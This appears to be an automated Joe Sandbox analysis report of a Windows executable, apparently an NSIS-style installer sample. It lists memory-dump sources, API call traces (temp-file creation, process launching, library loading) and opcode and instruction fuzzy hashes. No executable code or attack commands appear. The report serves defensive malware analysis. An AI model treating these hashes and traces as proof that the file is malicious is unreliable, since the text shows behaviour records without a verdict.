                                                                                                            • Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
                                                                                                            • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                                                                            • Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

Control-flow Graph (graph image not reproduced; node list and edges as extracted, legend: Executed / Not Executed)
• Nodes: 892 405b85-405b91; 893 405b92-405bc6 GetTickCount GetTempFileNameW; 894 405bd5-405bd7; 895 405bc8-405bca; 896 405bcc; 897 405bcf-405bd2
• Edges: 892->893, 893->894, 893->895, 894->897, 895->893, 895->896, 896->897
APIs
• GetTickCount.KERNEL32 ref: 00405BA3
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-386316673
• Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
• Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
APIs
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
  • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
  • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• API String ID: 3585118688-0
• Opcode ID: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
• Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
• Opcode Fuzzy Hash: 806019d01c4059dad2e07343b2bd93566fca4abe4f6ec66dc814e8540e8620d4
• Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
APIs
• IsWindowVisible.USER32(?), ref: 00405137
• CallWindowProcW.USER32(?,?,?,?), ref: 00405188
  • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
• Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
• CloseHandle.KERNEL32(?), ref: 00405697
Strings
• Error launching installer, xrefs: 00405678
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
• Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
APIs
  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061E1
  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\4NG0guPiKA.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 004061F5
  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00406208
• CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403512), ref: 00403347
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID: 1033$C:\Users\user\AppData\Local\Temp\
• API String ID: 4115351271-2916873424
• Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
• Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
• Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
• Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
• Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
• Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                            • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                            • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                            • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                            • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                            • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                            • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                            • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                            • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                            • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                            • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                            • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                            • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                            • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
